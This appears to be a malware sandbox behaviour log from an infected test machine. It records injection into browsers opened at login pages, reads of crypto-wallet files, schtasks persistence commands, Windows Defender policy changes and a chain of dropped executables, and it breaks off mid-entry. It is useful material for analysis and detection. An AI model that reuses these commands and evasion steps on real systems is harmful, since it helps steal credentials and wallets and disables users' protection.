parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1148,9833243971878915932,8282251979199750159,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=FEC6E6A7BA5F044C38A9880FE833C883 --mojo-platform-channel-handle=1156 --ignored=" --type=renderer " /prefetch:2
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1608 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
parent_process firefox.exe martian_process "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
parent_process firefox.exe martian_process "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\d88e0bf0-a961-4b49-a93d-a8743489b9d8.dmp"
parent_process firefox.exe martian_process "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2000 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1364,8014233654610286441,10230124045797015840,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=857B1112D202434AF8BCA3768DBBECF3 --mojo-platform-channel-handle=1388 --ignored=" --type=renderer " /prefetch:2
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
url http://127.0.0.1
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
file C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\parent.lock
file C:\Users\test22\AppData\Local\Temp\firefox\parent.lock
Process injection Process 2960 resumed a thread in remote process 2856
Process injection Process 2960 resumed a thread in remote process 1308
Process injection Process 2960 resumed a thread in remote process 1156
Process injection Process 2960 resumed a thread in remote process 176
Process injection Process 2960 resumed a thread in remote process 2208
Process injection Process 2960 resumed a thread in remote process 2664
Process injection Process 3012 resumed a thread in remote process 604
Process injection Process 176 resumed a thread in remote process 2980
Process injection Process 2932 resumed a thread in remote process 1308
Process injection Process 2208 resumed a thread in remote process 2580
Process injection Process 2568 resumed a thread in remote process 1156
Process injection Process 884 resumed a thread in remote process 2856
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2856
1 0 0

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x00000280
suspend_count: 1
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x00000288
suspend_count: 1
process_identifier: 176
1 0 0

NtResumeThread

thread_handle: 0x00000288
suspend_count: 1
process_identifier: 2208
1 0 0

NtResumeThread

thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 2664
1 0 0

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x0000000000000044
suspend_count: 1
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1308
1 0 0

NtResumeThread

thread_handle: 0x0000000000000044
suspend_count: 1
process_identifier: 2580
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 1156
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 2856
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 2856
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 2856
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 2856
1 0 0

NtResumeThread

thread_handle: 0x0000000000000154
suspend_count: 2
process_identifier: 2856
1 0 0
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
dead_host 5.42.64.33:80
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000130
suspend_count: 1
process_identifier: 2540
1 0 0

CreateProcessInternalW

thread_identifier: 2676
thread_handle: 0x00000138
process_identifier: 2672
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x0000013c
1 1 0

CreateProcessInternalW

thread_identifier: 2760
thread_handle: 0x00000144
process_identifier: 2756
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000140
1 1 0

NtResumeThread

thread_handle: 0x000001bc
suspend_count: 1
process_identifier: 2540
1 0 0

CreateProcessInternalW

thread_identifier: 2964
thread_handle: 0x0000063c
process_identifier: 2960
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000640
1 1 0

CreateProcessInternalW

thread_identifier: 2492
thread_handle: 0x00000640
process_identifier: 2488
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\vhaNZRtsx6oDxE2wLedH.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\vhaNZRtsx6oDxE2wLedH.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\vhaNZRtsx6oDxE2wLedH.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000648
1 1 0

CreateProcessInternalW

thread_identifier: 2792
thread_handle: 0x00000644
process_identifier: 2800
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000064c
1 1 0

CreateProcessInternalW

thread_identifier: 1616
thread_handle: 0x00000644
process_identifier: 2884
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000648
1 1 0

CreateProcessInternalW

thread_identifier: 2936
thread_handle: 0x0000064c
process_identifier: 2944
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000650
1 1 0

CreateProcessInternalW

thread_identifier: 3016
thread_handle: 0x000001e0
process_identifier: 3012
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
track: 1
command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000001e4
1 1 0

NtResumeThread

thread_handle: 0x00000260
suspend_count: 1
process_identifier: 2960
1 0 0

CreateProcessInternalW

thread_identifier: 1608
thread_handle: 0x000002bc
process_identifier: 2856
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
track: 1
command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com
filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002c8
1 1 0

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2856
1 0 0

CreateProcessInternalW

thread_identifier: 2000
thread_handle: 0x000002bc
process_identifier: 1308
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
track: 1
command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002d8
1 1 0

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 1308
1 0 0

CreateProcessInternalW

thread_identifier: 2444
thread_handle: 0x00000280
process_identifier: 1156
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
track: 1
command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000001e8
1 1 0

NtResumeThread

thread_handle: 0x00000280
suspend_count: 1
process_identifier: 1156
1 0 0

CreateProcessInternalW

thread_identifier: 560
thread_handle: 0x00000288
process_identifier: 176
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Program Files\Mozilla Firefox\firefox.exe
track: 1
command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000024c
1 1 0

NtResumeThread

thread_handle: 0x00000288
suspend_count: 1
process_identifier: 176
1 0 0

CreateProcessInternalW

thread_identifier: 2212
thread_handle: 0x00000288
process_identifier: 2208
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Program Files\Mozilla Firefox\firefox.exe
track: 1
command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000134
1 1 0

NtResumeThread

thread_handle: 0x00000288
suspend_count: 1
process_identifier: 2208
1 0 0

CreateProcessInternalW

thread_identifier: 2172
thread_handle: 0x000002a0
process_identifier: 2664
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Program Files\Mozilla Firefox\firefox.exe
track: 1
command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002c8
1 1 0

NtResumeThread

thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 2664
1 0 0

NtResumeThread

thread_handle: 0x00000214
suspend_count: 1
process_identifier: 3012
1 0 0

CreateProcessInternalW

thread_identifier: 812
thread_handle: 0x00000334
process_identifier: 604
current_directory:
filepath:
track: 1
command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000338
1 1 0

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x00000424
suspend_count: 1
process_identifier: 3012
1 0 0

NtResumeThread

thread_handle: 0x00000290
suspend_count: 1
process_identifier: 3012
1 0 0

NtGetContextThread

thread_handle: 0x00000198
1 0 0

NtResumeThread

thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x0000022c
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x0000024c
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x000007a4
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2488
1 0 0

CreateProcessInternalW

thread_identifier: 2624
thread_handle: 0x00000338
process_identifier: 2628
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000340
1 1 0

NtResumeThread

thread_handle: 0x00000114
suspend_count: 1
process_identifier: 2628
1 0 0

NtResumeThread

thread_handle: 0x00000264
suspend_count: 1
process_identifier: 2628
1 0 0

CreateProcessInternalW

thread_identifier: 2748
thread_handle: 0x00000288
process_identifier: 2752
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000290
1 1 0

CreateProcessInternalW

thread_identifier: 1376
thread_handle: 0x000003c0
process_identifier: 1316
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003dc
1 1 0

CreateProcessInternalW

thread_identifier: 3380
thread_handle: 0x00000408
process_identifier: 3376
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000420
1 1 0

CreateProcessInternalW

thread_identifier: 3564
thread_handle: 0x000003c4
process_identifier: 3560
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003ec
1 1 0

CreateProcessInternalW

thread_identifier: 3216
thread_handle: 0x000003d8
process_identifier: 3228
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000583001\store.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003dc
1 1 0

CreateProcessInternalW

thread_identifier: 3708
thread_handle: 0x00000404
process_identifier: 3716
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003dc
1 1 0

CreateProcessInternalW

thread_identifier: 3664
thread_handle: 0x000003e4
process_identifier: 1772
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003dc
1 1 0

CreateProcessInternalW

thread_identifier: 1924
thread_handle: 0x000003e0
process_identifier: 4092
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000414
1 1 0

CreateProcessInternalW

thread_identifier: 4512
thread_handle: 0x000003c4
process_identifier: 4508
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000023c
1 1 0

CreateProcessInternalW

thread_identifier: 4728
thread_handle: 0x00000160
process_identifier: 4724
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d8
1 1 0

CreateProcessInternalW

thread_identifier: 4848
thread_handle: 0x000003e0
process_identifier: 4844
current_directory: C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
filepath: C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
stack_pivoted: 0
